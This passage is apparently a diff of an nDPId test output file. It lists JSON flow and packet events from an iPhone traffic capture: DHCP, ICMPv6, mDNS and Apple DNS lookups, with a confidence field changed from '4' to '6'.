00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1582454595352,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454595352,"pkt":"xGGLNYKpxiwDYGpkCABFAAFILXQAAP8RB87AqAIBwKgCEQBDAEQBNJWvAgEGALeWutEAAAAAAAAAAMCoAhHAqAIBAAAAAMRhizWCqQAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQECNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1582454595354,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1582454595354,"pkt":"MzP\/mKKcxGGLNYKpht1gAAAAACA6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/mKKchwBApQAAAAD+gAAAAAAAAAgjPxeCmKKcDgEq29a5HEA="} -00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1582454595354,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":62,"pkt_l4_len":8,"thread_ts_msec":1582454595354,"pkt":"MzMAAAACxGGLNYKpht1gCzl3AAg6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQAQyAAAAAA="} -00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1582454595839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454595839,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1582454596364,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":130,"pkt_l4_len":68,"thread_ts_msec":1582454596364,"pkt":"MzMAAAAWxGGLNYKpht1gAAAAAEwAAf6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAIFJAAAAAwQAAAD\/AgAAAAAAAAAAAAAAAAD7BAAAAP8CAAAAAAAAAAAAAv8d2dAEAAAA\/wIAAAAAAAAAAAAB\/5iinA=="} -00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1582454596370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454596370,"pkt":"xGGLNYKpxiwDYGpkCABFAAFILXUAAP8RB83AqAIBwKgCEQBDAEQBNJKvAgEGALeWutEAAAAAAAAAAMCoAhHAqAIBAAAAAMRhizWCqQAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1582454596847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454596847,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKNMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADAABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1582454597360,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":130,"pkt_l4_len":68,"thread_ts_msec":1582454597360,"pkt":"MzMAAAAWxGGLNYKpht1gAAAAAEwAAf6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAIFJAAAAAwQAAAD\/AgAAAAAAAAAAAAAAAAD7BAAAAP8CAAAAAAAAAAAAAv8d2dAEAAAA\/wIAAAAAAAAAAAAB\/5iinA=="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1582454598204,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454598204,"pkt":"xiwDYGpkxGGLNYKpCABFAABMpW8AAP8RkM7AqAIRwKgCAfeVADUAOH2lldMBAAABAAAAAAAAE3AyNi1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQAAAQAB"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1582454598205,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454598205,"pkt":"xiwDYGpkxGGLNYKpCABFAABGS9oAAP8R6mnAqAIRwKgCAfanADUAMj\/EHhQBAAABAAAAAAAADXAyNi1mbWZtb2JpbGUGaWNsb3VkA2NvbQAAAQAB"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1582454598209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1582454598209,"pkt":"xiwDYGpkxGGLNYKpCABFAABFIREAAP8RFTTAqAIRwKgCAfGmADUAMT0yjvEBAAABAAAAAAAACmdzcGUzNS1zc2wCbHMFYXBwbGUDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1582454598212,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1582454598212,"pkt":"xiwDYGpkxGGLNYKpCABFAABEPtIAAP8R93PAqAIRwKgCAdpqADUAMKdbJH8BAAABAAAAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAQ=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598212,"flow_last_seen":1582454598212,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454598212,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454598246,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1582454598246,"pkt":"xiwDYGpkxGGLNYKpCABFAAA\/VFIAAP8R4fjAqAIRwKgCAcc\/ADUAK6bSYEMBAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598246,"flow_last_seen":1582454598246,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454598246,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": 